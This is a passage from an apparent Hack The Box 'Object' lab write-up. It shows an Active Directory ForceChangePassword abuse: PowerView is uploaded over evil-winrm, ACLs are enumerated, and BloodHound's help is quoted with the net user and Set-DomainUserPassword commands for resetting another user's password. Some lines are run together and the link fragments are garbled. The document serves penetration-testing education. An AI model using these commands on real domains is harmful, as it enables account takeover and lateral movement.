ForceChangePassword
Proceeding with the attack vector identified during the BloodHound enumeration
the oliver user has the forcechangepassword privilege over the smith user
*evil-winrm* ps c:\tmp> upload PowerView.ps1 C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/PowerView.ps1 to C:\tmp\
data: 1027036 bytes of 1027036 bytes copied
info: Upload successful!
*evil-winrm* ps c:\tmp> . .\PowerView.ps1i will first upload the powerview and import the script into the current PowerShell session
*evil-winrm* ps c:\tmp> Invoke-ACLScanner -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "oliver"}
objectdn : CN=Smith William,CN=Users,DC=object,DC=local
acequalifier : AccessAllowed
activedirectoryrights : ExtendedRight
objectacetype : User-Force-Change-Password
aceflags : None
acetype : AccessAllowedObject
inheritanceflags : None
securityidentifier : S-1-5-21-4088429403-1159899800-2753317549-1103
identityreferencename : oliver
identityreferencedomain : object.local
identityreferencedn : CN=Olivar Ava,CN=Users,DC=object,DC=local
identityreferenceclass : userUsing PowerView’s Invoke-ACLScanner, I can list the ACL of the oliver user
as shown above, the oliver user has the user-force-change-password ACE over the AD Object, CN=Smith William,CN=Users,DC=object,DC=local
BloodHound
The following is from the Help section of BloodHound;
There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net user dfm.a Password123! /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Set-DomainUserPassword function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the ForceChangePassword privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).
Example
to abuse this privilege with powerview’s set-domainuserpassword, first import powerview into your agent session or into a powershell instance at the console. you may need to authenticate to the domain controller [[object_bloodhound#object_forcechangepassword [forcechangepassword](https //www.thehacker.recipes/ad/movement/dacl/forcechangepassword) forcechangepassword|oliver@object.local]] if you are not running a process as that user. to do this in conjunction with set-domainuserpassword, first create a pscredential object (these examples comes from the powerview help documentation):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)then create a secure string object for the password you want to set on the target user:
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forcefinally, use set-domainuserpassword, optionally specifying $cred if you are not already running a process as [[object_bloodhound#object_forcechangepassword [forcechangepassword](https //www.thehacker.recipes/ad/movement/dacl/forcechangepassword) forcechangepassword|oliver@object.local]]:
Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred
Now that you know the target user’s plain text password, you can either start a new agent as that user, or use that user’s credentials in conjunction with PowerView’s ACL abuse functions, or perhaps even RDP to a system the target user has access to. For more ideas and information, see the references tab.
Moving on to the [[Object_Lateral_Movement_smith#[ForceChangePassword](https //www.thehacker.recipes/ad/movement/dacl/forcechangepassword)|Lateral Movement]] phase